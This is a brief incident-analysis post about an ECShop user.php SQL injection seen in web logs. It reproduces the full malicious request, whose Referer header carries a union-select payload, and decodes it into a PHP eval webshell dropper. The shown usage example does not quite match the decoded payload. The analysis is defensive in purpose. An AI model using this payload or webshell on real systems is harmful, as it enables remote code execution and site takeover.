user.php ECShop sql injection 2017

Malicious http get seen 8/20/2019 

GET/user.php?act=*****   HTTP/1.1

Connection: Keep-Alive 

Accept: */* 

Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:288:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325a6b5a334575634768774a79776e50443977614841675a585a686243676b583142505531526262475678645630704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";} 

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2) 

Host: redacted.com

   To see what it's trying to do convert Hex to ASCII

   0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325a6b5a334575634768774a79776e50443977614841675a585a686243676b583142505531526262475678645630704f79412f506963702729293b2f2f7d787878

   becomes

  {$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ2ZkZ3EucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbbGVxdV0pOyA/Picp'));//}xxx

   then convert the base64 to ascii

   ZmlsZV9wdXRfY29udGVudHMoJ2ZkZ3EucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbbGVxdV0pOyA/Picp

    becomes

   file_put_contents('fdgq.php','<?php eval($_POST[lequ]); ?>')

   which is in it's simplest form a php webshell.

   e.g. it would then be abused by the attacker in the following fashion

    redacted.com/fdgg.php?legu=whoami

  where "whoami" is the malicious command the hacker wants to execute

  This is attempting to exploit an ECShop sql injection vulnerability (notice the union select above in the referer) that can lead to remote code execution and for example the creation of a webshell , reference link is below

https://github.com/vulhub/vulhub/tree/master/ecshop/xianzhi-2017-02-82239600